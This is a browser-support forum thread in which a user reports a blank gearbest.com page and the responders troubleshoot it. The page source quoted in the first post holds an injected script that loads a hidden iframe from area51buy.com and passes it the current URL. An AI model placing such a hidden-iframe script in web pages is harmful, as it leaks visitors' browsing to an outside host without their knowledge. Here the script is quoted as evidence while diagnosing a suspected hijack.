AdwCleaner was unable to fix it. MalwareBytes also did not help. When I try to open gearbest.com in firefox I see a blank page. The source of the page:

 

<!DOCTYPE html>
<html>
<body>
	<script type="text/javascript">
	var url=location.href;
	var ifr = document.createElement('iframe'); 
    ifr.style.display = 'none'; 
    ifr.src ='//area51buy.com/'+'#'+url;
    document.body.appendChild(ifr); 
	</script>
</body>
</html>

 

 

Re: area51buy.com hijack

Greetings,

Can you give me the list of your installed addons - in Firefox?

Also, please share the AdwCleaner/Malwarebytes logfiles.

Thanks!

Re: area51buy.com hijack

Thanks for replying. I tested it with all addons disabled and the problem is still there. Both AdwCleaner and MalwareBytes tell me that "no threates were found".

I created a new clean Firefox profile and that problem disappeared, but I would like to be able to remove it from my current profile (to preserve history, open tabs, etc.)

I can send files from my firefox profile if that helps (I did a full text search on all files in my profile for text string "area51buy.com" but nothing relevant was found)

Re: area51buy.com hijack

Hello,

I can send files from my firefox profile if that helps (I did a full text search on all files in my profile for text string "area51buy.com" but nothing relevant was found)

Simplex, 2017-11-09 12:10:12 (UTC)

Yes, please do. I'm sure we'll find a solution.

Also,

Can you give me the list of your installed addons - in Firefox?

Also, please share the AdwCleaner/Malwarebytes logfiles.


cocochepeau, 2017-11-09 09:28:05 (UTC)

Thanks.

Re: area51buy.com hijack

Thanks! What files from firefox profile should I upload? Logs:

MalwareBytes: https://pastebin.com/8Cr1dNMP

AdwCleaner: https://pastebin.com/NatkW1J6

Addons: https://pastebin.com/4ZgCDJsT

 

EDIT: I just checked gearbest.com and now the page loads. I don't know what happened, but it's fixed.

Re: area51buy.com hijack

Hello,

Sorry for the late answer.

Glad to know it's now fixed. May be it was only related to gearbest.com, something like a defacement [1]? I can't find anything online about it tho.

Feel free to come back if you see anything weird again.

Regards.

[1] https://en.wikipedia.org/wiki/Website_defacement